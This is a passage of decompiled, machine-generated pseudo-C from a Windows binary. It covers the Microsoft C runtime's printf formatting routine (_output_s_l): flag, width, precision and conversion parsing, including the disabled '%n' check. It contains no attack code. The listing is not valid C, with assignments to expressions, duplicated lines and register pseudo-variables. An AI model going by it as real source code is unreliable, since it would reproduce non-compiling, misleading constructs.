                            												__eflags =  *(_t623 - 0x27c);
                            												if( *(_t623 - 0x27c) != 0) {
                            													goto L24;
                            												} else {
                            													 *((intOrPtr*)(L0040EC70(_t571))) = 0x16;
                            													E00411A50(_t558, _t571, _t621, _t622, L"(ch != _T(\'\\0\'))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x486, 0);
                            													 *(_t623 - 0x2f4) = 0xffffffff;
                            													E0040D380(_t623 - 0x40);
                            													_t503 =  *(_t623 - 0x2f4);
                            													goto L229;
                            												}
                            											}
                            										case 1:
                            											L25:
                            											 *(__ebp - 0x2c) = 0;
                            											__edx =  *(__ebp - 0x2c);
                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                            											__eax =  *(__ebp - 0x28);
                            											 *(__ebp - 0x18) =  *(__ebp - 0x28);
                            											__ecx =  *(__ebp - 0x18);
                            											 *(__ebp - 0x1c) = __ecx;
                            											 *(__ebp - 0x10) = 0;
                            											 *(__ebp - 0x30) = 0xffffffff;
                            											 *(__ebp - 0xc) = 0;
                            											goto L218;
                            										case 2:
                            											L26:
                            											__edx =  *((char*)(__ebp - 0x251));
                            											 *(__ebp - 0x31c) =  *((char*)(__ebp - 0x251));
                            											 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
                            											 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
                            											__eflags =  *(__ebp - 0x31c) - 0x10;
                            											if( *(__ebp - 0x31c) > 0x10) {
                            												goto L33;
                            											}
                            											L27:
                            											__ecx =  *(__ebp - 0x31c);
                            											_t74 = __ecx + 0x422618; // 0x498d04
                            											__edx =  *_t74 & 0x000000ff;
                            											switch( *((intOrPtr*)(( *_t74 & 0x000000ff) * 4 +  &M00422600))) {
                            												case 0:
                            													goto L30;
                            												case 1:
                            													goto L31;
                            												case 2:
                            													goto L29;
                            												case 3:
                            													goto L28;
                            												case 4:
                            													goto L32;
                            												case 5:
                            													goto L33;
                            											}
                            										case 3:
                            											L34:
                            											__edx =  *((char*)(__ebp - 0x251));
                            											__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
                            											if( *((char*)(__ebp - 0x251)) != 0x2a) {
                            												__eax =  *(__ebp - 0x18);
                            												__eax =  *(__ebp - 0x18) * 0xa;
                            												__eflags = __eax;
                            												__ecx =  *((char*)(__ebp - 0x251));
                            												_t98 = __ecx - 0x30; // -48
                            												__edx = __eax + _t98;
                            												 *(__ebp - 0x18) = __eax + _t98;
                            											} else {
                            												__eax = __ebp + 0x14;
                            												 *(__ebp - 0x18) = E0041C290(__ebp + 0x14);
                            												__eflags =  *(__ebp - 0x18);
                            												if( *(__ebp - 0x18) < 0) {
                            													__ecx =  *(__ebp - 0x10);
                            													__ecx =  *(__ebp - 0x10) | 0x00000004;
                            													__eflags = __ecx;
                            													 *(__ebp - 0x10) = __ecx;
                            													 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
                            													 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
                            												}
                            											}
                            											goto L218;
                            										case 4:
                            											L40:
                            											 *(__ebp - 0x30) = 0;
                            											goto L218;
                            										case 5:
                            											L41:
                            											__eax =  *((char*)(__ebp - 0x251));
                            											__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
                            											if( *((char*)(__ebp - 0x251)) != 0x2a) {
                            												__edx =  *(__ebp - 0x30);
                            												__edx =  *(__ebp - 0x30) * 0xa;
                            												__eflags = __edx;
                            												_t109 =  *((char*)(__ebp - 0x251)) - 0x30; // -48
                            												__ecx = __edx + _t109;
                            												 *(__ebp - 0x30) = __ecx;
                            											} else {
                            												__ecx = __ebp + 0x14;
                            												 *(__ebp - 0x30) = E0041C290(__ebp + 0x14);
                            												__eflags =  *(__ebp - 0x30);
                            												if( *(__ebp - 0x30) < 0) {
                            													 *(__ebp - 0x30) = 0xffffffff;
                            												}
                            											}
                            											goto L218;
                            										case 6:
                            											L47:
                            											__edx =  *((char*)(__ebp - 0x251));
                            											 *(__ebp - 0x320) =  *((char*)(__ebp - 0x251));
                            											 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
                            											 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
                            											__eflags =  *(__ebp - 0x320) - 0x2e;
                            											if( *(__ebp - 0x320) > 0x2e) {
                            												L70:
                            												goto L218;
                            											}
                            											L48:
                            											__ecx =  *(__ebp - 0x320);
                            											_t117 = __ecx + 0x422640; // 0x1e4e9003
                            											__edx =  *_t117 & 0x000000ff;
                            											switch( *((intOrPtr*)(( *_t117 & 0x000000ff) * 4 +  &M0042262C))) {
                            												case 0:
                            													L53:
                            													__edx =  *(__ebp + 0xc);
                            													__eax =  *( *(__ebp + 0xc));
                            													__eflags =  *( *(__ebp + 0xc)) - 0x36;
                            													if( *( *(__ebp + 0xc)) != 0x36) {
                            														L56:
                            														__edx =  *(__ebp + 0xc);
                            														__eax =  *( *(__ebp + 0xc));
                            														__eflags =  *( *(__ebp + 0xc)) - 0x33;
                            														if( *( *(__ebp + 0xc)) != 0x33) {
                            															L59:
                            															__edx =  *(__ebp + 0xc);
                            															__eax =  *( *(__ebp + 0xc));
                            															__eflags =  *( *(__ebp + 0xc)) - 0x64;
                            															if( *( *(__ebp + 0xc)) == 0x64) {
                            																L65:
                            																L67:
                            																goto L70;
                            															}
                            															L60:
                            															__ecx =  *(__ebp + 0xc);
                            															__edx =  *__ecx;
                            															__eflags =  *__ecx - 0x69;
                            															if( *__ecx == 0x69) {
                            																goto L65;
                            															}
                            															L61:
                            															__eax =  *(__ebp + 0xc);
                            															__ecx =  *( *(__ebp + 0xc));
                            															__eflags = __ecx - 0x6f;
                            															if(__ecx == 0x6f) {
                            																goto L65;
                            															}
                            															L62:
                            															__edx =  *(__ebp + 0xc);
                            															__eax =  *( *(__ebp + 0xc));
                            															__eflags =  *( *(__ebp + 0xc)) - 0x75;
                            															if( *( *(__ebp + 0xc)) == 0x75) {
                            																goto L65;
                            															}
                            															L63:
                            															__ecx =  *(__ebp + 0xc);
                            															__edx =  *__ecx;
                            															__eflags =  *__ecx - 0x78;
                            															if( *__ecx == 0x78) {
                            																goto L65;
                            															}
                            															L64:
                            															__eax =  *(__ebp + 0xc);
                            															__ecx =  *( *(__ebp + 0xc));
                            															__eflags = __ecx - 0x58;
                            															if(__ecx != 0x58) {
                            																 *(__ebp - 0x25c) = 0;
                            																goto L18;
                            															}
                            															goto L65;
                            														}
                            														L57:
                            														__ecx =  *(__ebp + 0xc);
                            														__edx =  *((char*)(__ecx + 1));
                            														__eflags =  *((char*)(__ecx + 1)) - 0x32;
                            														if( *((char*)(__ecx + 1)) != 0x32) {
                            															goto L59;
                            														} else {
                            															 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            															 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            															__ecx =  *(__ebp - 0x10);
                            															__ecx =  *(__ebp - 0x10) & 0xffff7fff;
                            															 *(__ebp - 0x10) = __ecx;
                            															goto L67;
                            														}
                            													}
                            													L54:
                            													__ecx =  *(__ebp + 0xc);
                            													__edx =  *((char*)(__ecx + 1));
                            													__eflags =  *((char*)(__ecx + 1)) - 0x34;
                            													if( *((char*)(__ecx + 1)) != 0x34) {
                            														goto L56;
                            													} else {
                            														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            														__ecx =  *(__ebp - 0x10);
                            														__ecx =  *(__ebp - 0x10) | 0x00008000;
                            														 *(__ebp - 0x10) = __ecx;
                            														goto L67;
                            													}
                            												case 1:
                            													L68:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
                            													goto L70;
                            												case 2:
                            													L49:
                            													__eax =  *(__ebp + 0xc);
                            													__ecx =  *( *(__ebp + 0xc));
                            													__eflags = __ecx - 0x6c;
                            													if(__ecx != 0x6c) {
                            														__ecx =  *(__ebp - 0x10);
                            														__ecx =  *(__ebp - 0x10) | 0x00000010;
                            														__eflags = __ecx;
                            														 *(__ebp - 0x10) = __ecx;
                            													} else {
                            														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
                            														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            													}
                            													goto L70;
                            												case 3:
                            													L69:
                            													__eax =  *(__ebp - 0x10);
                            													__eax =  *(__ebp - 0x10) | 0x00000800;
                            													__eflags = __eax;
                            													 *(__ebp - 0x10) = __eax;
                            													goto L70;
                            												case 4:
                            													goto L70;
                            											}
                            										case 7:
                            											L71:
                            											__ecx =  *((char*)(__ebp - 0x251));
                            											 *(__ebp - 0x324) = __ecx;
                            											 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
                            											 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
                            											__eflags =  *(__ebp - 0x324) - 0x37;
                            											if( *(__ebp - 0x324) > 0x37) {
                            												goto L190;
                            												do {
                            													do {
                            														while(1) {
                            															L190:
                            															if( *(_t623 - 0x28) != 0) {
                            																goto L216;
                            															}
                            															goto L191;
                            														}
                            														L186:
                            														__ebp - 0x49 = __ebp - 0x49 -  *(__ebp - 4);
                            														 *(__ebp - 0x24) = __ebp - 0x49 -  *(__ebp - 4);
                            														__ecx =  *(__ebp - 4);
                            														__ecx =  *(__ebp - 4) + 1;
                            														 *(__ebp - 4) = __ecx;
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000200;
                            														__eflags =  *(__ebp - 0x10) & 0x00000200;
                            													} while (( *(__ebp - 0x10) & 0x00000200) == 0);
                            													__eflags =  *(__ebp - 0x24);
                            													if( *(__ebp - 0x24) == 0) {
                            														break;
                            													}
                            													L188:
                            													__eax =  *(__ebp - 4);
                            													__ecx =  *( *(__ebp - 4));
                            													__eflags = __ecx - 0x30;
                            												} while (__ecx == 0x30);
                            												L189:
                            												 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            												 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            												__eax =  *(__ebp - 4);
                            												 *( *(__ebp - 4)) = 0x30;
                            												__ecx =  *(__ebp - 0x24);
                            												__ecx =  *(__ebp - 0x24) + 1;
                            												__eflags = __ecx;
                            												 *(__ebp - 0x24) = __ecx;
                            												while(1) {
                            													L190:
                            													if( *(_t623 - 0x28) != 0) {
                            														goto L216;
                            													}
                            													goto L191;
                            												}
                            											}
                            											L72:
                            											_t158 =  *(__ebp - 0x324) + 0x4226ac; // 0xcccccc0d
                            											__ecx =  *_t158 & 0x000000ff;
                            											switch( *((intOrPtr*)(__ecx * 4 +  &M00422670))) {
                            												case 0:
                            													L122:
                            													 *(__ebp - 0x2c) = 1;
                            													__ecx =  *((char*)(__ebp - 0x251));
                            													__ecx =  *((char*)(__ebp - 0x251)) + 0x20;
                            													__eflags = __ecx;
                            													 *((char*)(__ebp - 0x251)) = __cl;
                            													goto L123;
                            												case 1:
                            													L73:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            													__eflags =  *(__ebp - 0x10) & 0x00000830;
                            													if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            														__eax =  *(__ebp - 0x10);
                            														__eax =  *(__ebp - 0x10) | 0x00000800;
                            														__eflags = __eax;
                            														 *(__ebp - 0x10) = __eax;
                            													}
                            													goto L75;
                            												case 2:
                            													L87:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            													__eflags =  *(__ebp - 0x10) & 0x00000830;
                            													if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            														__ecx =  *(__ebp - 0x10);
                            														__ecx =  *(__ebp - 0x10) | 0x00000800;
                            														__eflags = __ecx;
                            														 *(__ebp - 0x10) = __ecx;
                            													}
                            													goto L89;
                            												case 3:
                            													L146:
                            													 *(__ebp - 0x260) = 7;
                            													goto L148;
                            												case 4:
                            													goto L0;
                            												case 5:
                            													L123:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            													__eax = __ebp - 0x248;
                            													 *(__ebp - 4) = __ebp - 0x248;
                            													 *(__ebp - 0x44) = 0x200;
                            													__eflags =  *(__ebp - 0x30);
                            													if( *(__ebp - 0x30) >= 0) {
                            														L125:
                            														__eflags =  *(__ebp - 0x30);
                            														if( *(__ebp - 0x30) != 0) {
                            															L128:
                            															__eflags =  *(__ebp - 0x30) - 0x200;
                            															if( *(__ebp - 0x30) > 0x200) {
                            																 *(__ebp - 0x30) = 0x200;
                            															}
                            															L130:
                            															__eflags =  *(__ebp - 0x30) - 0xa3;
                            															if( *(__ebp - 0x30) > 0xa3) {
                            																 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
                            																 *(__ebp - 0x20) = L0040B5C0(__ecx,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
                            																__eflags =  *(__ebp - 0x20);
                            																if( *(__ebp - 0x20) == 0) {
                            																	 *(__ebp - 0x30) = 0xa3;
                            																} else {
                            																	__eax =  *(__ebp - 0x20);
                            																	 *(__ebp - 4) =  *(__ebp - 0x20);
                            																	 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
                            																	 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
                            																}
                            															}
                            															 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            															 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            															__eax =  *(__ebp + 0x14);
                            															__ecx =  *(__eax - 8);
                            															__edx =  *(__eax - 4);
                            															 *(__ebp - 0x2a8) =  *(__eax - 8);
                            															 *(__ebp - 0x2a4) =  *(__eax - 4);
                            															__ecx = __ebp - 0x40;
                            															_push(E0040D3B0(__ebp - 0x40));
                            															__eax =  *(__ebp - 0x2c);
                            															_push( *(__ebp - 0x2c));
                            															__ecx =  *(__ebp - 0x30);
                            															_push( *(__ebp - 0x30));
                            															__edx =  *((char*)(__ebp - 0x251));
                            															_push( *((char*)(__ebp - 0x251)));
                            															__eax =  *(__ebp - 0x44);
                            															_push( *(__ebp - 0x44));
                            															__ecx =  *(__ebp - 4);
                            															_push( *(__ebp - 4));
                            															__edx = __ebp - 0x2a8;
                            															_push(__ebp - 0x2a8);
                            															__eax =  *0x60b3cc; // 0x7e8c4bdb
                            															__eax =  *__eax();
                            															__esp = __esp + 0x1c;
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            															__eflags =  *(__ebp - 0x10) & 0x00000080;
                            															if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																__eflags =  *(__ebp - 0x30);
                            																if( *(__ebp - 0x30) == 0) {
                            																	__ecx = __ebp - 0x40;
                            																	_push(E0040D3B0(__ebp - 0x40));
                            																	__edx =  *(__ebp - 4);
                            																	_push( *(__ebp - 4));
                            																	__eax =  *0x60b3d8; // 0x7e8c4bdb
                            																	__eax =  *__eax();
                            																	__esp = __esp + 8;
                            																}
                            															}
                            															__ecx =  *((char*)(__ebp - 0x251));
                            															__eflags =  *((char*)(__ebp - 0x251)) - 0x67;
                            															if( *((char*)(__ebp - 0x251)) == 0x67) {
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																if(( *(__ebp - 0x10) & 0x00000080) == 0) {
                            																	__ecx = __ebp - 0x40;
                            																	_push(E0040D3B0(__ebp - 0x40));
                            																	__eax =  *(__ebp - 4);
                            																	_push( *(__ebp - 4));
                            																	__ecx =  *0x60b3d4; // 0x7e8c4bdb
                            																	E00410200(__ecx) =  *__eax();
                            																	__esp = __esp + 8;
                            																}
                            															}
                            															__edx =  *(__ebp - 4);
                            															__eax =  *( *(__ebp - 4));
                            															__eflags =  *( *(__ebp - 4)) - 0x2d;
                            															if( *( *(__ebp - 4)) == 0x2d) {
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																__edx =  *(__ebp - 4);
                            																__edx =  *(__ebp - 4) + 1;
                            																__eflags = __edx;
                            																 *(__ebp - 4) = __edx;
                            															}
                            															__eax =  *(__ebp - 4);
                            															 *(__ebp - 0x24) = E0040DC40( *(__ebp - 4));
                            															goto L190;
                            														}
                            														L126:
                            														__ecx =  *((char*)(__ebp - 0x251));
                            														__eflags = __ecx - 0x67;
                            														if(__ecx != 0x67) {
                            															goto L128;
                            														}
                            														L127:
                            														 *(__ebp - 0x30) = 1;
                            														goto L130;
                            													}
                            													L124:
                            													 *(__ebp - 0x30) = 6;
                            													goto L130;
                            												case 6:
                            													L75:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
                            													__eflags =  *(__ebp - 0x10) & 0x00000810;
                            													if(( *(__ebp - 0x10) & 0x00000810) == 0) {
                            														__ebp + 0x14 = E0041C290(__ebp + 0x14);
                            														 *(__ebp - 0x284) = __ax;
                            														__cl =  *(__ebp - 0x284);
                            														 *(__ebp - 0x248) = __cl;
                            														 *(__ebp - 0x24) = 1;
                            													} else {
                            														 *(__ebp - 0x280) = 0;
                            														__edx = __ebp + 0x14;
                            														__eax = E0041C2D0(__ebp + 0x14);
                            														 *(__ebp - 0x258) = __ax;
                            														__eax =  *(__ebp - 0x258) & 0x0000ffff;
                            														__ecx = __ebp - 0x248;
                            														__edx = __ebp - 0x24;
                            														 *(__ebp - 0x280) = E004212A0(__ebp - 0x24, __ebp - 0x248, 0x200,  *(__ebp - 0x258) & 0x0000ffff);
                            														__eflags =  *(__ebp - 0x280);
                            														if( *(__ebp - 0x280) != 0) {
                            															 *(__ebp - 0x28) = 1;
                            														}
                            													}
                            													__edx = __ebp - 0x248;
                            													 *(__ebp - 4) = __ebp - 0x248;
                            													do {
                            														L190:
                            														if( *(_t623 - 0x28) != 0) {
                            															goto L216;
                            														}
                            														goto L191;
                            													} while ( *(__ebp - 0x324) > 0x37);
                            													goto L72;
                            												case 7:
                            													L143:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            													 *(__ebp - 8) = 0xa;
                            													goto L153;
                            												case 8:
                            													L108:
                            													__ecx = __ebp + 0x14;
                            													 *(__ebp - 0x298) = E0041C290(__ebp + 0x14);
                            													__eax = E00420F80();
                            													__eflags = __eax;
                            													if(__eax != 0) {
                            														L118:
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            														__eflags =  *(__ebp - 0x10) & 0x00000020;
                            														if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            															__edx =  *(__ebp - 0x298);
                            															__eax =  *(__ebp - 0x24c);
                            															 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
                            														} else {
                            															__eax =  *(__ebp - 0x298);
                            															 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
                            														}
                            														 *(__ebp - 0x28) = 1;
                            														while(1) {
                            															L190:
                            															if( *(_t623 - 0x28) != 0) {
                            																goto L216;
                            															}
                            															goto L191;
                            														}
                            													}
                            													L109:
                            													__edx = 0;
                            													__eflags = 0;
                            													if(0 == 0) {
                            														 *(__ebp - 0x32c) = 0;
                            													} else {
                            														 *(__ebp - 0x32c) = 1;
                            													}
                            													__eax =  *(__ebp - 0x32c);
                            													 *(__ebp - 0x29c) =  *(__ebp - 0x32c);
                            													__eflags =  *(__ebp - 0x29c);
                            													if( *(__ebp - 0x29c) == 0) {
                            														_push(L"(\"\'n\' format specifier disabled\", 0)");
                            														_push(0);
                            														_push(0x695);
                            														_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            														_push(2);
                            														__eax = L0040E1A0();
                            														__esp = __esp + 0x14;
                            														__eflags = __eax - 1;
                            														if(__eax == 1) {
                            															asm("int3");
                            														}
                            													}
                            													__eflags =  *(__ebp - 0x29c);
                            													if( *(__ebp - 0x29c) != 0) {
                            														L117:
                            														while(1) {
                            															L190:
                            															if( *(_t623 - 0x28) != 0) {
                            																goto L216;
                            															}
                            															goto L191;
                            														}
                            													} else {
                            														L116:
                            														 *((intOrPtr*)(L0040EC70(__ecx))) = 0x16;
                            														__eax = E00411A50(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
                            														 *(__ebp - 0x2f8) = 0xffffffff;
                            														__ecx = __ebp - 0x40;
                            														__eax = E0040D380(__ecx);
                            														__eax =  *(__ebp - 0x2f8);
                            														goto L229;
                            													}
                            												case 9:
                            													L151:
                            													 *(__ebp - 8) = 8;
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            													__eflags =  *(__ebp - 0x10) & 0x00000080;
                            													if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            														__edx =  *(__ebp - 0x10);
                            														__edx =  *(__ebp - 0x10) | 0x00000200;
                            														__eflags = __edx;
                            														 *(__ebp - 0x10) = __edx;
                            													}
                            													goto L153;
                            												case 0xa:
                            													L145:
                            													 *(__ebp - 0x30) = 8;
                            													goto L146;
                            												case 0xb:
                            													L89:
                            													__eflags =  *(__ebp - 0x30) - 0xffffffff;
                            													if( *(__ebp - 0x30) != 0xffffffff) {
                            														__edx =  *(__ebp - 0x30);
                            														 *(__ebp - 0x328) =  *(__ebp - 0x30);
                            													} else {
                            														 *(__ebp - 0x328) = 0x7fffffff;
                            													}
                            													__eax =  *(__ebp - 0x328);
                            													 *(__ebp - 0x290) =  *(__ebp - 0x328);
                            													__ecx = __ebp + 0x14;
                            													 *(__ebp - 4) = E0041C290(__ebp + 0x14);
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
                            													__eflags =  *(__ebp - 0x10) & 0x00000810;
                            													if(( *(__ebp - 0x10) & 0x00000810) == 0) {
                            														L100:
                            														__eflags =  *(__ebp - 4);
                            														if( *(__ebp - 4) == 0) {
                            															__edx =  *0x60b4f0; // 0x407424
                            															 *(__ebp - 4) = __edx;
                            														}
                            														__eax =  *(__ebp - 4);
                            														 *(__ebp - 0x28c) =  *(__ebp - 4);
                            														while(1) {
                            															L103:
                            															__ecx =  *(__ebp - 0x290);
                            															 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            															 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            															__eflags = __ecx;
                            															if(__ecx == 0) {
                            																break;
                            															}
                            															L104:
                            															__eax =  *(__ebp - 0x28c);
                            															__ecx =  *( *(__ebp - 0x28c));
                            															__eflags = __ecx;
                            															if(__ecx == 0) {
                            																break;
                            															}
                            															L105:
                            															 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
                            															 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
                            														}
                            														L106:
                            														__eax =  *(__ebp - 0x28c);
                            														__eax =  *(__ebp - 0x28c) -  *(__ebp - 4);
                            														__eflags = __eax;
                            														 *(__ebp - 0x24) = __eax;
                            														goto L107;
                            													} else {
                            														L93:
                            														__eflags =  *(__ebp - 4);
                            														if( *(__ebp - 4) == 0) {
                            															__eax =  *0x60b4f4; // 0x407414
                            															 *(__ebp - 4) = __eax;
                            														}
                            														 *(__ebp - 0xc) = 1;
                            														__ecx =  *(__ebp - 4);
                            														 *(__ebp - 0x294) =  *(__ebp - 4);
                            														while(1) {
                            															L96:
                            															__edx =  *(__ebp - 0x290);
                            															 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            															 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            															__eflags =  *(__ebp - 0x290);
                            															if( *(__ebp - 0x290) == 0) {
                            																break;
                            															}
                            															L97:
                            															__ecx =  *(__ebp - 0x294);
                            															__edx =  *( *(__ebp - 0x294)) & 0x0000ffff;
                            															__eflags =  *( *(__ebp - 0x294)) & 0x0000ffff;
                            															if(( *( *(__ebp - 0x294)) & 0x0000ffff) == 0) {
                            																break;
                            															}
                            															L98:
                            															 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
                            															 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
                            														}
                            														L99:
                            														 *(__ebp - 0x294) =  *(__ebp - 0x294) -  *(__ebp - 4);
                            														__ecx =  *(__ebp - 0x294) -  *(__ebp - 4) >> 1;
                            														 *(__ebp - 0x24) = __ecx;
                            														L107:
                            														while(1) {
                            															L190:
                            															if( *(_t623 - 0x28) != 0) {
                            																goto L216;
                            															}
                            															goto L191;
                            														}
                            													}
                            												case 0xc:
                            													L144:
                            													 *(__ebp - 8) = 0xa;
                            													goto L153;
                            												case 0xd:
                            													L147:
                            													 *(__ebp - 0x260) = 0x27;
                            													L148:
                            													 *(__ebp - 8) = 0x10;
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            													__eflags =  *(__ebp - 0x10) & 0x00000080;
                            													if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            														 *((char*)(__ebp - 0x14)) = 0x30;
                            														 *(__ebp - 0x260) =  *(__ebp - 0x260) + 0x51;
                            														__eflags =  *(__ebp - 0x260) + 0x51;
                            														 *((char*)(__ebp - 0x13)) = __al;
                            														 *(__ebp - 0x1c) = 2;
                            													}
                            													L153:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
                            													__eflags =  *(__ebp - 0x10) & 0x00008000;
                            													if(( *(__ebp - 0x10) & 0x00008000) == 0) {
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
                            														__eflags =  *(__ebp - 0x10) & 0x00001000;
                            														if(( *(__ebp - 0x10) & 0x00001000) == 0) {
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            															__eflags =  *(__ebp - 0x10) & 0x00000020;
                            															if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																	__ecx = __ebp + 0x14;
                            																	__eax = E0041C290(__ebp + 0x14);
                            																	__edx = 0;
                            																	__eflags = 0;
                            																	 *(__ebp - 0x2b8) = __eax;
                            																	 *(__ebp - 0x2b4) = 0;
                            																} else {
                            																	__eax = __ebp + 0x14;
                            																	__eax = E0041C290(__ebp + 0x14);
                            																	asm("cdq");
                            																	 *(__ebp - 0x2b8) = __eax;
                            																	 *(__ebp - 0x2b4) = __edx;
                            																}
                            															} else {
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																	__ecx = __ebp + 0x14;
                            																	E0041C290(__ebp + 0x14) = __ax & 0x0000ffff;
                            																	asm("cdq");
                            																	 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
                            																	 *(__ebp - 0x2b4) = __edx;
                            																} else {
                            																	__eax = __ebp + 0x14;
                            																	__eax = E0041C290(__ebp + 0x14);
                            																	__ax = __eax;
                            																	asm("cdq");
                            																	 *(__ebp - 0x2b8) = __eax;
                            																	 *(__ebp - 0x2b4) = __edx;
                            																}
                            															}
                            														} else {
                            															__eax = __ebp + 0x14;
                            															 *(__ebp - 0x2b8) = E0041C2B0(__ebp + 0x14);
                            															 *(__ebp - 0x2b4) = __edx;
                            														}
                            													} else {
                            														__ecx = __ebp + 0x14;
                            														 *(__ebp - 0x2b8) = E0041C2B0(__ebp + 0x14);
                            														 *(__ebp - 0x2b4) = __edx;
                            													}
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            													__eflags =  *(__ebp - 0x10) & 0x00000040;
                            													if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            														L170:
                            														__ecx =  *(__ebp - 0x2b8);
                            														 *(__ebp - 0x2c0) =  *(__ebp - 0x2b8);
                            														__edx =  *(__ebp - 0x2b4);
                            														 *(__ebp - 0x2bc) =  *(__ebp - 0x2b4);
                            														goto L171;
                            													} else {
                            														L166:
                            														__eflags =  *(__ebp - 0x2b4);
                            														if(__eflags > 0) {
                            															goto L170;
                            														}
                            														L167:
                            														if(__eflags < 0) {
                            															L169:
                            															 *(__ebp - 0x2b8) =  ~( *(__ebp - 0x2b8));
                            															__edx =  *(__ebp - 0x2b4);
                            															asm("adc edx, 0x0");
                            															__edx =  ~( *(__ebp - 0x2b4));
                            															 *(__ebp - 0x2c0) =  ~( *(__ebp - 0x2b8));
                            															 *(__ebp - 0x2bc) =  ~( *(__ebp - 0x2b4));
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            															L171:
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
                            															__eflags =  *(__ebp - 0x10) & 0x00008000;
                            															if(( *(__ebp - 0x10) & 0x00008000) == 0) {
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
                            																__eflags =  *(__ebp - 0x10) & 0x00001000;
                            																if(( *(__ebp - 0x10) & 0x00001000) == 0) {
                            																	__edx =  *(__ebp - 0x2c0);
                            																	__eax =  *(__ebp - 0x2bc);
